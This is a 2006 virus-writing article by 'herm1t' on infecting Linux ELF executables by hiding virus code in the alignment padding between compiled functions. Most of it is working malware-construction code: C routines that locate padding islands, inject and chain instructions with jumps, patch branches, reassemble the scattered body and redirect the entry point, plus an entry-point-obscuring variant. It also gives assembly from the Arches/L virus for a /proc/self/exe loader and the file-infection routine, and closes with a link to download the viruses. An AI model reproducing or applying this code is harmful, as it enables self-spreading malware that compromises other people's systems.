Infecting ELF-files using function padding for Linux
herm1t
August 2006
[
Back to index] [
Comments (0)]
Introduction
Not so long ago, i have read two articles concerned with amusing method of ELF-file infection [1,2], I want to talk about. It's amazing, but the tools presented by Z0mbie and Ares both intended to injecting trojans, and I still didn't saw any viruses using this technology, though may be I looked in the wrong direction. :-) Method is unusual and has both advantages and disadvantages, but let's discuss everything step by step.
In order to increase the perfomance of code the compiler will align functions, cycles, access to data and stack on the boundary multiple by power of two. You may see the alignment options of gcc by `cc1 --help`, but we will focus on how all these look like in code. Let's see:
805cb99: 89 0d 10 0e 0e 08 mov %ecx,0x80e0e10
805cb9f: 89 ec mov %ebp,%esp
805cba1: 5d pop %ebp ; one function ended
805cba2: c3 ret ; here
805cba3: 8d b6 00 00 00 00 lea 0x0(%esi),%esi ; *padding*
805cba9: 8d bc 27 00 00 00 00 lea 0x0(%edi),%edi ; *padding*
805cbb0: 55 push %ebp ; here the next one
805cbb1: 89 e5 mov %esp,%ebp ; begins
As much as thirteen bytes in a single function! Precisely these islands of free space we will use to write our code to. We will infect the file as follows:
- Get our code from the current process memory
- Remove the linking jumps from it
- Find a victim
- Open the victim, map it into memory, check it, find the .text section
- Look there for all the free space islands
- Try to insert our code instruction by instruction into the found islands, linking them together with "jmp near"
- Fix all conditional and uncoditional branch instructions (JMP/Jcc/CALL)
- Fix the headers or the code of the victim, so that the virus will receive the control upon execution
What we will get as a result? Here is what the virus loader injected in bash look like:
805c1f3: 60 pusha
805c1f4: 68 78 65 00 00 push $0x6578
805c1f9: e9 25 03 00 00 jmp 805c523 ---+
....... .............. .................. |
805c523: 68 6c 66 2f 65 push $0x652f666c <--+
805c528: e9 1b 02 00 00 jmp 805c748 ---+
....... .............. .................. |
805c748: e9 c6 00 00 00 jmp 805c813 <==|
805c74d: 90 nop |
805c74e: 90 nop |
805c74f: 90 nop |
....... .............. .................. |
805c813: 68 63 2f 73 65 push $0x65732f63 <--+
805c818: e9 06 03 00 00 jmp 805cb23 ---+
....... .............. .................. |
805cb23: 68 2f 70 72 6f push $0x6f72702f <--+
805cb28: 6a 05 push $0x5
805cb2a: 58 pop %eax
805cb2b: e9 73 00 00 00 jmp 805cba3 ---+
|
....... .............. ..................
....... .............. ..................
8060708: e9 47 01 00 00 jmp 8060854 ---+
806070d: 90 nop |
806070e: 90 nop |
806070f: 90 nop |
....... .............. .................. |
8060854: 68 10 b5 05 08 push $0x805b510 <--+
8060859: c3 ret
New entry point: 0x805c1f3
Old entry point: 0x805b510
Let's consider each step individually.
Looking for the free space
As a preliminary we'll examine the list of instructions used for alignment (from the binutils, file gas/config/tc-i386.c):
{0x90}; /* nop */
{0x89,0xf6}; /* movl %esi,%esi */
{0x8d,0x76,0x00}; /* leal 0(%esi),%esi */
{0x8d,0x74,0x26,0x00}; /* leal 0(%esi,1),%esi */
{0x90, /* nop */
0x8d,0x74,0x26,0x00}; /* leal 0(%esi,1),%esi */
{0x8d,0xb6,0x00,0x00,0x00,0x00}; /* leal 0L(%esi),%esi */
{0x8d,0xb4,0x26,0x00,0x00,0x00,0x00}; /* leal 0L(%esi,1),%esi */
{0x90, /* nop */
0x8d,0xb4,0x26,0x00,0x00,0x00,0x00}; /* leal 0L(%esi,1),%esi */
{0x89,0xf6, /* movl %esi,%esi */
0x8d,0xbc,0x27,0x00,0x00,0x00,0x00}; /* leal 0L(%edi,1),%edi */
{0x8d,0x76,0x00, /* leal 0(%esi),%esi */
0x8d,0xbc,0x27,0x00,0x00,0x00,0x00}; /* leal 0L(%edi,1),%edi */
{0x8d,0x74,0x26,0x00, /* leal 0(%esi,1),%esi */
0x8d,0xbc,0x27,0x00,0x00,0x00,0x00}; /* leal 0L(%edi,1),%edi */
{0x8d,0xb6,0x00,0x00,0x00,0x00, /* leal 0L(%esi),%esi */
0x8d,0xbf,0x00,0x00,0x00,0x00}; /* leal 0L(%edi),%edi */
{0x8d,0xb6,0x00,0x00,0x00,0x00, /* leal 0L(%esi),%esi */
0x8d,0xbc,0x27,0x00,0x00,0x00,0x00}; /* leal 0L(%edi,1),%edi */
{0x8d,0xb4,0x26,0x00,0x00,0x00,0x00, /* leal 0L(%esi,1),%esi */
0x8d,0xbc,0x27,0x00,0x00,0x00,0x00}; /* leal 0L(%edi,1),%edi */
{0xeb,0x0d,0x90,0x90,0x90,0x90,0x90, /* jmp .+15; lotsa nops */
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90};
We will search the above signatures with their checksum and length, which will reduce the table size. To lower the count of the false matches we will set the following restrictions:
- The island we are going to use is located in the .text section.
- If it is not a jmp .+15/nop/... it must be preceded by C3 (RET).
- The island should start on the instruction boundary.
- The found island (without RET/JMP commands) should be at least 6 bytes long (there'll be the "jmp near" to the next island in the end of each island except one or more of our instructions).
InfELF uses more complicated search algorithm, but the one of ours gives reasonably good result, and need less memory and time.
To satisfy the third condition we'll use the length disassembler, mlde32 by uNdErX for instance. The found islands we'll place in the single linked list sorted by offsets:
typedef struct _island island_t;
struct __attribute__((packed)) _island {
uint32_t offset; /* offset */
uint32_t length; /* length */
island_t *next; /* the next item in the list */
};
We'll store the signatures in the patterns array:
struct {
int length; /* length */
/* the offset within the found island
from which we can place our code (1) */
int shift;
uint32_t crc32; /* checksum */
} patterns[] = {
{15, 1,0x11d50a7f},
{14, 1,0xe4ad564a},
{15, 2,0xd5cae9dc}, // EB 0D 90 90 ...
{13, 1,0xd6b6dcfd},
{12, 1,0x19fbc1f4},
{11, 1,0x34a6685b},
{10, 1,0x74d8dd25},
{9, 1,0x6ed89f27},
{8, 1,0xb7109f48},
{7, 1,0x5d30a0da}, // C3 8D B6 00 00 00 00
};
(1) We need patterns.shift to satisfy the fourth condition. The first bytes of the signatures are either C3 (RET), or EB 0D (jmp .+15) we should not erase. Therefore, to obtain the offset and the length of the free space island we'll add shift to the offset and substract it from the length.
Here is the C code for the search routine:
island_t *islands = NULL, *p, *tail;
unsigned char *ptr = m + text_offset;
int op_len;
while (ptr < m + text_offset + text_size) {
for (i = 0; i < 10; i++)
if (crc32(ptr, patterns[i].length) == patterns[i].crc32) {
p = (island_t*)malloc(sizeof(island_t));
p->offset = (uint32_t)(ptr + patterns[i].shift);
p->length = patterns[i].length - patterns[i].shift;
p->next = NULL;
if (islands == NULL)
islands = p;
else
tail->next = p;
tail = p;
ptr += patterns[i].length;
continue;
}
if ((op_len = mlde32(ptr)) <= 0) {
fprintf(stderr, "Illegal instruction!\n");
return 2;
}
ptr += op_len;
}
To satisfy the first condition we have to know the offset of the .text section in the file, its size and address. Let's walk through the file headers. The e_shstrndx field in the ELF file header hold the index of the string table section in the section headers table, and e_shnum the number of sections. We are interested in the following fields of the elements of section table:
- sh_name
- offset in the string table of the section name
- sh_offset
- offset of the section in file
- sh_addr
- address of the section in memory
- sh_size
- size of the section
The C code that will find the .text section:
// m - the pointer to the mmaped file
Elf32_Ehdr *ehdr = (Elf32_Ehdr*)m;
Elf32_Shdr *shdr = (Elf32_Shdr*)(m + ehdr->e_shoff), *s;
uint32_t strtab, text_addr, text_size, text_offset = 0;
char *name;
int i;
// does the file have the string table?
if (ehdr->e_shstrndx != SHN_UNDEF) {
// get the offset of the string table
strtab = shdr[ehdr->e_shstrndx].sh_offset;
// look through all of the section headers
for (i = 0, s = shdr; i < ehdr->e_shnum; i++, s++) {
name = m + strtab + s->sh_name;
// look for the section named ".text"
if (!strncmp(name, ".text", 5)) {
text_addr = s->sh_addr;
text_size = s->sh_size;
text_offset = s->sh_offset;
break;
}
}
}
Code injection
Suppose that all of the virus instructions are stored already in the list of structures named "code", of the following type:
typedef struct _code code_t;
struct __attribute__((packed)) _code {
uint8_t *src; /* address in memory */
uint8_t *dst; /* address in victim map */
uint32_t len; /* length */
uint8_t *jmpto; /* destination address of JMP/CALL/Jcc, or 0 */
code_t *next; /* the next structure in list */
};
The only thing remaining for us to do is to insert as much commands to each island as possible, fill the "dst" field of "code_t" structures, link the islands together with jumps and fix the branch addresses. Here goes:
island_t *i;
code_t *c;
int n, l;
for (i = islands, l = 0, c = code; c != NULL; )
// do we have enough space for the command in the current island
// (taking in mind the jmp near in the end)
if (l + c->len <= (i->length - 5)) {
// save the address (we'll need it later)
c->dst = i->offset + l;
// copy the command
memcpy(c->dst, c->src, c->len);
// increase the counter of the used space for the
// current island
l += c->len;
// move to the next command
c = c->next;
} else {
// ... there is no space left
// pad the remaining space with NOPs
for (n = l; n < i->length; n++)
*(uint8_t*)(i->offset + n) = 0x90;
// if we have more islands, append the jmp near
// to the next island
if (i->next != NULL) {
*((uint8_t *)(i->offset + l)) = 0xe9;
*((uint32_t*)(i->offset + l + 1)) = i->next->offset - i->offset - l - 5;
} else
// we have no space at all, we can't infect this file...
exit(2);
// try to write this command to the next island
i = i->next;
l = 0;
}
Fix the addresses of the branches:
for (c = code; c != NULL; c = c->next)
// for each command with non zero branch address
if (c->jmpto != 0) {
// look for the command with the same address
for (d = code; d != NULL; d = d->next)
if (c->jmpto == d->src) {
// fix the address
*((uint32_t*)(c->dst + c->len - 4)) = d->dst - c->dst - c->len;
break;
}
// not found. :-( the jump in the program leading to nowhere
// will crash the program for sure. stop this until it's too late...
if (d == NULL)
exit(2);
}
Reconstructing our own code
Here we came to the last and the most rugged part of the technology: we infected one file and to infect the next one we need to find our own code scattered through the file, reassemble it and remove the linking jumps out of it. We'll need for that the length disassembler, the virus entry point (we'll start disassembling from there) and the label at the end of the virus denoting that it's time to stop. To determine our own entry point we can not use the traditional virus mantra:
virus_start: pusha
...
call delta
delta: pop ebp
sub ebp, (delta - virus_start)
Because all three commands (say nothing of the preceding) might lay in the hundreds of instructions one from another, that's why we will write our entry point to the body of the virus at the stage of infection. To identify where to, let's choose some command which will occure in our code only once, let it be "mov esp, ?":
mov eax, esp ; save esp
mov esp, virus_start ; here we will write
; our new entry point
mov [ebp + virus_entry], esp ; save to variable
mov esp, eax ; restore esp
And the HLT instruction will be a signal for the disassembler that the virus has ended and it's time to return the result. We have another similar problem: when the work is done the virus must return the control to the infected host, if we use the "jmp near" command for that, we need to distinguish it from the other JMPs, to prevent the disassembler to follow it to the main program. We can place this jump immediately before the HLT and add the corresponding adjustment. And generally we can use the PUSH/RET instead of jump (we'll examine such possibility also).
code_t *code = NULL, *code_ret = NULL, code_vep = NULL;
void reassemble(uint8_t *ptr) {
code_t *c, *q;
int op_len;
for (;;) {
// HLT
if (*ptr == 0xf4)
return;
// do we already have command with that offset in the list?
for (c = code; c != NULL; c = c->next)
if (c->src == ptr)
return;
// get the length
op_len = mlde32(ptr);
// invalid opcode
if (op_len <= 0)
return;
// fill the new list element
c = (code_t*)malloc(sizeof(code_t));
c->src = ptr;
c->jmpto = 0;
c->len = op_len;
c->next = NULL;
// insert sort in ascending addresses order
if (code == NULL || c->src < code->src) {
c->next = code;
code = c;
} else {
q = code;
while (q->next != NULL && q->next->src < c->src)
q = q->next;
c->next = q->next;
q->next = c;
}
// RET/RETN ?
if (*ptr == 0xc3 || *ptr == 0xc2)
return;
// memorize the pointer to this element, latter we will
// write new entry point in the argument of the command
// MOV ESP, ?
if (*ptr == 0xbc)
code_vep = c;
// CALL/JMP/Jcc ?
if (*ptr == 0xe8 || *ptr == 0xe9 || (*ptr == 0x0f && (*(ptr + 1) & 0xf0) == 0x80)) {
// calculate the branch address
c->jmpto = ptr + op_len + *((uint32_t*)(ptr + op_len - 4));
// jmp?
if (*ptr == 0xe9) {
// if the HLT is follows, than this is
// "jmp old_entry_point". memorize the address
// of this element and increase the length for
// HLT to be copied along with the jmp
// as single instruction
if (*(ptr + 5) == 0xf4) {
code_ret = c;
c->jmpto = 0;
c->len++;
} else {
// go to the calculated address
ptr = c->jmpto;
continue;
}
} else {
// CALL/JCC
// recursive call. exit either after RET, or after
// already disassembled instruction, or after the
// end of the virus
reassemble(c->jmpto);
}
}
// move to the next command
ptr += op_len;
}
}
reassemble(virus_entry);
The virus code should not contain JMP/Jcc SHORT/LOOP/LOOPxx,JECXZ instructions. It is most likely that after injection the destination addresses of these commands will come out of range of +-128 bytes. Naturally, we can replace the above commands with their NEAR equivalents at runtime, but such replacements has any meaning only in the case when we are going not only to expand short commands to near, but also the reverse (otherwise the code doing the replacements will be executed once and will not be used further). Since we have not enough resources for the multipass optimization of code we will avoid the instructions listed above.
Now we need to remove the linking jumps from the reconstructed code. Since the list is sorted, it's sufficient to check is the jump pointing to the next command in list, if so, we can remove it. Like this:
for (prev = code, c = code->next; c->next != NULL; c = c->next)
if (c->src[0] != 0xe9 || c->jmpto != c->next->src) {
prev->next = c;
prev = c;
}
prev->next = c;
Fixing the headers
A very little more is left to do: save the addresses we need in the body of the virus and fix the ELF-file header, so that entry point will refer to the begining of the virus. Break through the all necessary calculations:
#define DST2VADDR(x) (x - m - text_offset + text_addr)
// code is the first command of virus, code->dst is the new entry point
// we'll save it in the virus body (for disassembler).
// code_vep, the pointer to the "mov esp, ?" we memorized
// at the stage of disassembly
*((uint32_t*)(code_vep->dst + 1)) = DST2VADDR(code->dst);
// write the jump argument for return to the old entry point
// code_ret, the pointer to the jump command we memorized
// at the stage of disassembly
*((uint32_t*)(code_ret->dst + 1)) =
ehdr->e_entry - DST2VADDR(code_ret->dst) - 5;
ehdr->e_entry = DST2VADDR(code->dst);
What else we can do?
It's easy enough to add the EPO (entry point obscuring) to the infection routine described above. We need to add the following fragment to the free space search routine (we're looking through the file anyway, why not to find at the same time the instruction we can hang on):
uint8_t *firstcall = NULL;
//...
if (firstcall == 0 && *ptr == 0xe8)
firstacall = ptr;
for (i = 0; i < 10; i++)
//...
And make over the final part (described in the previous chapter) in the following way:
// didn't found any call
if (firstcall == NULL)
exit(2);
// calculate and save in code_ret the address the call pointed to
*((uint32_t*)(code_ret->dst + 1)) = DST2VADDR(firstcall) +
*((uint32_t*)(firstcall + 1)) - DST2VADDR(code_ret->dst);
// update the CALL, so it will point to us
*((uint32_t*)(firstcall + 1)) =
DST2VADDR(code->dst) - DST2VADDR(firstcall) - 5;
All done. We don't touch entry point. Quite naturally, it wouldn't be the first CALL, or not a CALL, but JMP, and not a JMP, but whatever you want. But that all is up to you.
Completely or by pieces?
Let's look with fpstat how many space is available in average ELF-file:
$ for i in /bin/*;do ./fpstat $i;done|
> awk 'BEGIN{a=0;c=0}/^Total/{if($2>0){c++;a+=$2}}END{print a,c,a/c}'
35740 84 425,476
It's a shade better with /usr/bin, but by a negligible margin:
590556 1368 431,693
So the bona fide programs are ready to donate 430 bytes on the average to our virus. It's possible to optimize the virus, but not at such degree. We can limit the infection to the large files like bash, vim or php, but also we can inject into the file only the loader and put the whole virus body in the end of the file, like it was suggested in [2]. The loader must:
- Open the file in which it resides (/proc/self/exe)
- Map the end of the file into memory, starting from offset file_length - virus_length, with attributes PROT_READ|PROT_EXEC (the offset must be aligned on page boundary or mmap will fail).
- Transfer control to the address immediately following the loader, but in the mmaped file.
Here comes:
_start: pusha
; h = open ("/proc/self/exe", O_RDONLY);
push dword 0x00006578
push dword 0x652f666c
push dword 0x65732f63
push dword 0x6f72702f
movb eax, SYS_open
mov ebx, esp
movb ecx, 0
int 0x80
add esp, byte 16
or eax,eax
js near exit
xchg eax,ebx
; l = lseek (h, 0, 2);
movb eax, SYS_lseek
movb ecx, 0
movb edx, 2
int 0x80
or eax, eax
js near exit
; l -= VIRUS_SIZE;
sub eax, VIRUS_SIZE
; a = mmap(NULL,VIRUS_SIZE,PROT_READ|PROT_EXEC,MAP_PRIVATE,h,l);
mpush eax, ebx, MAP_PRIVATE, PROT_READ|PROT_EXEC,VIRUS_SIZE,0
mov ebx, esp
movb eax, SYS_mmap
int 0x80
add esp, byte 24
cmp eax, 0xfffff000
ja near exit
lea ebx, [eax + (run - _start)]
; this instruction the disassembler will leave unattended (for good)
jmp ebx
; to exit. the disassembler will stop where.
jmp near exit
run:
; save the virus entry point for disassembler (also we can map the
; file to the fixed address and than, we just need to replace the
; "self" variable with the choosen address)
push eax
...
pop edx
mov self, edx
push edx
call reassemble
...
exit: popa
; here, like it was promissed we are using the PUSH/RET to return
; the conmtrol to the host. HLT is not needed, disassembler will
; return on RET.
db 0x68
__code_ret: dd fake_host
ret
By the way, we no more need the special cases for the HLT and saving the virus entry point in the body of the virus, so we can remove the following fragments:
//...
if (*ptr == 0xf4)
return;
//...
if (*ptr == 0xbc)
code_vep = c;
//...
if (*(ptr + 5) == 0xf4) {
code_ret = c;
c->len++;
}
//...
Now let's look what changes we have to do in the virus itself:
- Align the file, so it length will be multiple of page size
- Write the virus body at the end of file
- Save the old entry point in file
- Change the entry point
The fragment of the Arches/L virus:
; enlarge the file, so the length will be multiple of page size
movb eax, SYS_ftruncate
mov ebx, file_handle
mov ecx, file_length
add ecx, 4095
and ecx, 0xfffff000
mov edi, ecx
int 0x80
or eax, eax
jnz near unmap
; move the pointer to the end
movb eax, SYS_lseek
movb edx, 0 ;SEEK_SET
int 0x80
cmp eax, ecx
jne near unmap
; write the virus body
movb eax, SYS_write
mov ecx, self
mov edx, VIRUS_SIZE
int 0x80
cmp eax, edx
jne near unmap
; move the pointer to the argument of PUSH command
movb eax, SYS_lseek
mov ecx, -VIRUS_SIZE + (__code_ret - _start)
movb edx, 1 ; SEEK_CUR
int 0x80
; write the old entry point
mov esi, file_map
mov edx, [esi + e_entry]
push edx
mov eax, SYS_write
mov ebx, file_handle
mov ecx, esp
movb edx, 4
int 0x80
add esp, edx
cmp edx, eax
jne near unmap
; calculate the new entry point
mov eax, code
mov eax, [eax + code_dst]
sub eax, esi
sub eax, text_offset
add eax, text_addr
; change the entry point in the ELF header
mov [esi + e_entry], eax
That's all, you comments is welcome. herm1t@vx.netlux.org
Download Arches,Arches/L viruses and the utilities
References
- Z0mbie "Injected Evil", 2002
- Ares "Static linked ELF infecting", 2004
[
Back to index] [
Comments (0)]